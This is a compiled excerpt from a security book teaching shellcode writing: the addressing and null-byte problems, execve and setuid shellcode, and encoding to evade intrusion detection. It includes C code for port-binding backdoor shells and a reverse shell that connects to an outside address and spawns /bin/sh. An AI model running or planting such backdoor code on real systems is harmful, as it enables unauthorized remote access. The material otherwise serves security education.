IDIOTS GUIDE TO SHELL CODING
From the Book Buffer Overflow Attacks
Remote code execution vulnerabilities can quickly morph into
automated threats such as network-borne viruses or the better
known Internet worms. The Sasser worm, and its variants,
turned out to be one of the most devastating and costly worms
ever released in the networked world. It proliferated via a critical
buffer overflow found in multiple Microsoft operating systems.
Worms and worm variants are some of the most interesting
code released in recent times.
Internet worms are composed of four main components:
■ Vulnerability Scanning
■ Exploitation
■ Proliferation
■ Copying
Given the amount of slang associated with buffer overflows,
we felt it necessary to quickly broach one topic that is
commonly misunderstood. As you’ve probably come to
realize already, buffer overflows are a specific type of
vulnerability and the process of leveraging or utilizing that
vulnerability to penetrate a vulnerable system is referred
to as “exploiting a system.” Exploits are programs that
automatically test a vulnerability and in most cases attempt
to leverage that vulnerability by executing code. Should the
vulnerability be a denial of service, an exploit would attempt
to crash the system. If the vulnerability were a remotely
exploitable buffer overflow, the exploit would attempt to
overflow the vulnerable buffer on the target and spawn a
shell that connects back to the attacking system.
Writing shellcode involves an in-depth understanding of
assembly language for the target architecture in question.
Usually, different shellcode is required for each version of
each operating system in each hardware architecture.
Within shellcode, system calls are used to perform actions.
Therefore, most shellcode is operating system dependent,
because most operating systems use different system calls.
Reusing code from the program into which the shellcode is
injected is possible but difficult, and not often seen. As you saw in the
previous chapter, it is always recommended that you first
write the shellcode in C using system calls only and then
write it in assembly.
This chapter covers the two common problems
that shellcode must overcome: the addressing
problem and the null byte problem. It concludes
with some examples of writing both
remote and local shellcode for the 32-bit
Intel Architecture (IA32) platform
(also referred to as x86).
Shellcode is the code executed when a vulnerability
has been exploited.
The Tools
During the shellcode development process, you will need to
make use of many tools to write, compile, convert, test, and
debug the shellcode. Understanding how these tools work
will help you become more efficient in creating shellcode.
The following is a list of the most commonly used tools, with
pointers to more information and downloads.
■ NASM The NASM package contains an assembler named
nasm and a disassembler named ndisasm.
■ GDB GDB is the GNU debugger. In this chapter, we will
mainly use it to analyze core dump files. GDB can also
disassemble functions of compiled code with the
disassemble command, which lets you see how your C code
translates to assembly language.
■ ObjDump ObjDump is a tool used to disassemble files and obtain
important information from them.
■ Ktrace The ktrace utility, available on *BSD systems only, enables
kernel trace logging. The tool creates a file named ktrace.out, which
can be viewed by using the kdump utility. Ktrace allows you to see all
system calls a process is using. This can be very useful for debugging
shellcode because ktrace also shows when a system call execution fails.
■ Strace The strace program is very similar to ktrace: it can be used to
trace all system calls a program is issuing. strace is installed on most
Linux systems by default.
The Assembly Programming Language
Every processor comes with an instruction set that
can be used to write executable code for that specific
processor type. Using this instruction set, you can
assemble a program that can be executed by the
processor. The instruction sets are processor-type
dependent; you cannot, for example, use the assembly
source of a program that was written for an Intel
Pentium processor on a Sun Sparc platform. Because
assembly is a very low-level programming language,
you can write very tiny and fast programs. In this chapter,
we will demonstrate this by writing a 23-byte piece of
executable code that executes a file. If you write the
same code in C, the end result will be hundreds
of times bigger because of all the extra data added
by the compiler. Also note that the lowest-level parts of
most operating systems are written in assembly. If you
take a look at the Linux and FreeBSD source code,
you will find assembly in places such as the system call
entry code. Writing programs in assembly code can be
very efficient, but it also has many disadvantages.
Large programs get very complex and hard to read.
Also, because the assembly code is processor-dependent,
you can’t port it easily to other platforms. It’s difficult to
port assembly code not only to different processors but
also to different operating systems running on the same
processor. This is because programs written in assembly
code often contain hard-coded system calls—functions
provided by the operating system (OS)— and these
differ a lot with each OS.
The Addressing Problem
Normal programs refer to variables and functions using
pointers that are often defined by the compiler or retrieved
from a function such as malloc, which is used to allocate
memory and returns a pointer to this memory. If you write
shellcode, very often you like to refer to a string or other
variable. For example, when you write execve shellcode,
you need a pointer to the string that contains the program
you want to execute. Since shellcode is injected into a program
at run time, it cannot rely on addresses fixed at build time and
has to work out where in memory it is running. For example, if the code
contains a string, it will have to determine the memory address
of the string before it can use it. This is a big issue, because if
you want your shellcode to use system calls that require
pointers to arguments, you will have to know where in
memory your argument values are located. The first solution
to this issue is finding out the location of your data on the
stack by using the “call” and “jmp” instructions.
The second solution is to push your arguments on the stack
and then store the value of the stack pointer ESP.
We’ll discuss both solutions.
System Call Numbers
Every system call has a unique number that is known by
the kernel. These numbers are not often displayed in the
system call man pages but can be found in the kernel
sources and header files. On Linux systems, a header file
named syscall.h contains all system call numbers, while
on FreeBSD the system call numbers can be found in the
file unistd.h.
Remote Shellcode
When a host is exploited remotely, a multitude of options
are available to actually gain access to that particular machine.
The first choice is usually to try the vanilla execve code to
see if it works for that particular server. If that server
duplicated the socket descriptors to stdout and stdin,
small execve shellcode will work just fine. Often, however,
this is not the case. In this section, we will explore different
shellcode methodologies that apply to remote vulnerabilities.
Port-Binding Shellcode
One of the most common shellcodes for remote vulnerabilities
simply binds a shell to a high port. This allows an attacker to
create a server on the exploited host that executes a shell
when connected to. By far the most primitive technique,
this is quite easy to implement in shellcode. In C, the code
for port-binding shellcode looks like this:
Example 2.15 Port-Binding Shellcode
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
    int i, new, sockfd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sin = {0};

    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = 0;            /* INADDR_ANY: all interfaces */
    sin.sin_port = htons(12345);
    bind(sockfd, (struct sockaddr *)&sin, sizeof(sin));
    listen(sockfd, 5);
    new = accept(sockfd, NULL, 0);
    for (i = 2; i >= 0; i--)
        dup2(new, i);                   /* stderr, stdout, stdin -> socket */
    execl("/bin/sh", "sh", (char *)NULL);
    return 1;                           /* reached only if execl fails */
}
Socket Descriptor Reuse Shellcode
When choosing shellcode for an exploit, you should always assume that a firewall
will be in place with a default deny policy. In this case, port-binding shellcode
usually is not the best choice. A better tactic is to recycle the current
socket descriptor and utilize that socket instead of creating a new one.
In essence, the shellcode iterates through the descriptor table, looking for
the correct socket. If the correct socket is found, the descriptors are duplicated
and a shell is executed.
Local Shellcode
Shellcode that is used for local vulnerabilities is also used for remote vulnerabilities.
The differentiator between local and remote shellcode is the fact that local
shellcode does not perform any network operations whatsoever. Instead, local
shellcode typically executes a shell, escalates privileges, or breaks out of a chroot
jailed shell.
execve Shellcode
The most basic shellcode is execve shellcode. In essence, execve shellcode is
used to execute commands on the exploited system, usually /bin/sh. Execve is
actually a system call provided by the kernel for command execution.
setuid Shellcode
Often when a program is exploited for root privileges, the attacker receives an
euid equal to 0 when what is desired is a uid of 0. To solve this problem, a
simple snippet of shellcode is used to set the uid to 0.
Let’s take a look at the setuid code in C:
#include <unistd.h>

int main(void)
{
    setuid(0);
    return 0;
}
chroot Shellcode
Some applications are placed in what is called a “chroot jail” during execution.
This chroot jail only allows the application to access a specific directory, setting
the root “/” of the filesystem to the folder that is allowed to be accessed. When
exploiting a program that is placed in a chroot jail, there must be a way to break
out of the jail before attempting to execute the shellcode.
Summary
Assembly language is a key component in creating effective shellcode. The C
programming language generates code that contains all kinds of data that
shouldn’t end up in shellcode. With assembly language, every instruction is
translated literally in executable bits that the processor understands.
Choosing the correct shellcode to compromise and backdoor a host can
often determine the success of an attack. The attacker’s shellcode determines
how easily the exploit is likely to be detected by a network or host-based
IDS/IPS (intrusion detection system/intrusion prevention system).
Solutions Fast Track
Shellcode Overview
Shellcode must be specifically written for individual hardware and
operating system combinations. In general, preassembled shellcode exists
for a variety of Wintel, Solaris SPARC, and x86 architectures, as well as
multiple flavors of Linux.
Numerous tools are available to assist developers and security
researchers for shellcode generation and analysis. A few of the better
tools include NASM, GDB, ObjDump, KTrace, Strace, and Readelf.
Accurate and reliable shellcode should be a requirement for full-fledged
system penetration testing. Simple vulnerability scans fall short of
testing if identified vulnerabilities are not tested and verified.
The Addressing Problem
Statically referencing memory address locations is difficult with
shellcode since memory locations often change on different system
configurations.
In assembly, “call” is slightly different than “jmp”. When “call” is
executed, it pushes the return address (the address of the instruction
that follows the call) on the stack and then jumps to the function it
received as an argument.
Assembly code is processor-dependent, thereby making it a difficult
process to port shellcode to other platforms.
It’s difficult to not only port assembly code to different processors but
also to different operating systems running on the same processor since
programs written in assembly code often contain hardcoded system
calls.
The Null Byte Problem
Most string functions expect that the strings they are about to process
are terminated by NULL bytes. When your shellcode contains a NULL
byte, this byte will be interpreted as a string terminator, with the result
that the program accepts the shellcode in front of the NULL byte and
discards the rest.
We make the content of EAX 0 (or NULL) by XOR’ring the register
with itself. Then we place “al”, the 8-bit version of EAX, at offset 14 of
our string.
Implementing System Calls
When writing code in assembly for Linux and *BSD, you can call the
kernel to process a system call by using the “int 0x80” instruction.
Every system call has a unique number that is known by the kernel.
These numbers are not often displayed in the system call man pages but
can be found in the kernel sources and header files.
The system call return values are often placed in the EAX register.
However, there are some exceptions, such as the fork() system call on
FreeBSD, which places return values in different registers.
Remote Shellcode
Identical shellcode can be used for both local and remote exploits, the
differentiator being that remote shellcode may include remote
shell-spawning code and port-binding code.
One of the most common shellcodes for remote vulnerabilities simply
binds a shell to a high port. This allows an attacker to create a server on
the exploited host that executes a shell when connected to.
When choosing shellcode for an exploit, one should always assume that
a firewall will be in place with a default deny policy. In this case, one
tactic is to recycle the current socket descriptor and utilize that socket
instead of creating a new one.
Local Shellcode
Identical shellcode can be used for both local and remote exploits, the
differentiator being that local shellcode does not perform any network
operations.
Q: Shellcode development looks too hard for me. Are there tools that can generate
this code for me?
A: Yes, there are. Currently, several tools are available that allow you to easily
create shellcode using scripting languages such as Python. In addition, many
Web sites on the Internet have large amounts of different shellcode types
available for download. Googling for “shellcode” is a useful starting point.
Because shellcode is injected in running programs, it has to be written in a special
manner so that it is position-independent. This is necessary because the
memory of a running program changes very quickly; using static memory
addresses in shellcode to, for example, jump to functions or refer to a string, is
not possible.
When shellcode is used to take control of a program, it is first necessary to
get the shellcode in the program’s memory and then to let the program
somehow execute it. This means you will have to sneak it into the program’s
memory, which sometimes requires very creative thinking. For example, a
single-threaded Web server may have data in memory from an old request while
already starting to process a new request. So you might embed the shellcode
with the rest of the payload in the first request while triggering the execution of
it using the second request.
execve Shellcode
The execve shellcode is probably the most used shellcode in the world. The goal
of this shellcode is to let the application into which it is being injected run an
application such as /bin/sh.
Port-Binding Shellcode
Port-binding shellcode is often used to exploit remote program vulnerabilities.
The shellcode opens a port and executes a shell when someone connects to the
port. So, basically, the shellcode is a backdoor on the remote system.
NOTE
Be careful when executing port-binding shellcode! It creates a backdoor
on your system as long as it’s running!
This is the first example where you will see that it is possible to execute
several system calls in a row and how the return value from one system call can
be used as an argument for a second system call. The C code in Example 3.13
does exactly what we would like to do with our port-binding shellcode.
Example 3.13 Binding a Shell
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int soc, cli;
struct sockaddr_in serv_addr;

int main()
{
    serv_addr.sin_family = 2;              /* AF_INET */
    serv_addr.sin_addr.s_addr = 0;         /* INADDR_ANY */
    serv_addr.sin_port = 0xAAAA;           /* port 43690 */
    soc = socket(2, 1, 0);                 /* AF_INET, SOCK_STREAM */
    bind(soc, (struct sockaddr *)&serv_addr, 0x10);
    listen(soc, 1);
    cli = accept(soc, 0, 0);
    dup2(cli, 0);
    dup2(cli, 1);
    dup2(cli, 2);
    execve("/bin/sh", 0, 0);
}
Reverse Connection Shellcode
Reverse connection shellcode makes a connection from the hacked system to a
different system where it can be caught with network tools such as netcat. Once
the shellcode is connected, it will spawn an interactive shell. The fact that the
shellcode generates a connection from the hacked machine makes it very useful
for trying to exploit a vulnerability in a server behind a firewall. This kind of
shellcode can also be used for vulnerabilities that cannot be exploited directly.
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int soc, rc;
struct sockaddr_in serv_addr;

int main()
{
    serv_addr.sin_family = 2;                 /* AF_INET */
    serv_addr.sin_addr.s_addr = 0x210c060a;   /* 10.6.12.33 on little-endian x86 */
    serv_addr.sin_port = 0xAAAA;              /* port 43690 */
    soc = socket(2, 1, 6);                    /* AF_INET, SOCK_STREAM, IPPROTO_TCP */
    rc = connect(soc, (struct sockaddr *)&serv_addr, 0x10);
    dup2(soc, 0);
    dup2(soc, 1);
    dup2(soc, 2);
    execve("/bin/sh", 0, 0);
}
As you can see, this code is very similar to the port-binding C implementation,
except that we replace the bind and accept system calls with a connect
system call.
Socket Reusing Shellcode
Port-binding shellcode is very useful for some remote vulnerabilities, but is
often too large and not very efficient. This is especially true when exploiting a
remote vulnerability to which you have to make a connection. With socket
reusing shellcode, this connection can be reused, which saves a lot of code and
increases the chance that your exploit will work.
Encoding Shellcode
Shellcode encoding has been gaining popularity for purely malicious technical
reasons. In this technique, the exploit encodes the shellcode and places a
decoder in front of the shellcode. Once executed, the decoder decodes the
shellcode and jumps to it.
When the exploit encodes your shellcode with a different value every time
it is executed and uses a decoder that is created on-the-fly, your payload
becomes polymorphic and almost no IDS will be able to detect it. Some IDS
plug-ins have the ability to decode encoded shellcode. However,
these systems are extremely CPU intensive and are not widely deployed
on the Internet or in enterprise environments.
Reusing Program Variables
Sometimes a program allows you to store and execute only a very tiny shellcode.
In such cases, you may want to reuse variables or strings that are declared
in the program. This results in very small shellcode and increases the chance that
your exploit will work.
One major drawback of reusing program variables is that the exploit will
only work with the same versions of the program that have been compiled with
the same compiler. For example, an exploit reusing variables and written for a
program on Red Hat Linux 9.0 probably won’t work for the same program on
Red Hat 6.2.
OS-Spanning Shellcode
The main advantage of using shellcode that runs on multiple OSs is that you
only have to use one shellcode array in your exploit so that payload, except for
length and return addresses, will always be the same. The main disadvantage of
multi-OS shellcode is that you will always have to determine on what operating
system your shellcode is executed.
Finding out whether your shellcode is executing on a BSD or Linux system
is fairly easy. Just execute a system call number that exists on both systems
but performs a completely different task on each, and then analyze the return value. In the case
of Linux and FreeBSD, system call 39 is interesting. In Linux, this system call
stands for mkdir, and in FreeBSD it stands for getppid.
Understanding Existing Shellcode
Now that you know how shellcode is developed, you will probably also want to
learn how you can reverse-engineer shellcode.
Summary
The best of the best shellcode can be written to execute on multiple platforms
while still being efficient code. Such OS-spanning code is more difficult to
write and test; however, shellcode created with this advantage can be extremely
useful for creating applications that can execute commands or create shells on a
variety of systems quickly. The Slapper example analyzes the actual shellcode
utilized in the infamous and quite malicious Slapper worm that quickly spread
throughout the Internet in mere hours, finding and exploiting vulnerable systems.
Using this shellcode as an example, it became quickly apparent when we
were searching for relevant code which examples we could utilize.
Solutions Fast Track
Shellcode Examples
Shellcode must be written for different operating platforms; the
underlying hardware and software configurations determine what
assembly language must be utilized to create the shellcode.
In order to compile the shellcode, you have to install nasm on a test
system. nasm allows you to compile the assembly code so you can
convert it to a string and use it in an exploit.
The file descriptors 0, 1, and 2 are used for stdin, stdout, and stderr,
respectively. These are special file descriptors that can be used to read
data and to write normal and error messages.
The execve shellcode is probably the most used shellcode in the world.
The goal of this shellcode is to let the application into which it is being
injected run an application such as /bin/sh.
Shellcode encoding has been gaining popularity. In this technique, the
exploit encodes the shellcode and places a decoder in front of the
shellcode. Once executed, the decoder decodes the shellcode and jumps
to it.
Reusing Program Variables
It is very important to know that once a shellcode is executed within a
program, it can take control of all file descriptors used by that program.
One major drawback of reusing program variables is that the exploit
will only work with the same versions of the program that have been
compiled with the same compiler. For example, an exploit reusing
variables and written for a program on Red Hat Linux 9.0 probably
won’t work for the same program on Red Hat 6.2.
OS-Spanning Shellcode
The main advantage of using shellcode that runs on multiple OSs is that
you only have to use one shellcode array in your exploit. Thus, that
payload, except for length and return addresses, will always be the same.
The main disadvantage of multi-OS shellcode is that you always have
to determine on what operating system your shellcode is executed.
Finding out whether your shellcode is executing on a BSD or Linux
system is fairly easy. Just execute a system call number that exists on
both systems but performs a completely different task on each, and then
analyze the return value.
Understanding Existing Shellcode
Disassemblers are extremely valuable tools that can be utilized to assist
in the creation and analysis of custom shellcode.
With its custom 80x86 assembler, nasm is an excellent tool for creating
and modifying shellcode.
Q: Can an IDS detect polymorphic shellcode?
A: Several security vendors are working on, or already have, products that can
detect polymorphic shellcode. However, the methods they use to do this are
still very CPU-consuming and therefore aren’t often implemented on customer
sites. So encoded and polymorphic shellcode will lower the risk that
shellcode is picked up by an IDS.
Q: Can I spoof my address during an exploit that uses reverse port-binding
shellcode?
A: It would be hard if your exploit has the reverse shellcode. Our shellcode
uses TCP to make the connection. If you control a machine that is between
the hacked system and the target IP that you have used in the shellcode,
then it might be possible to send spoofed TCP packets that cause commands
to be executed on the target. This is extremely difficult, however, and
in general you cannot spoof the address used in the TCP connect back
shellcode.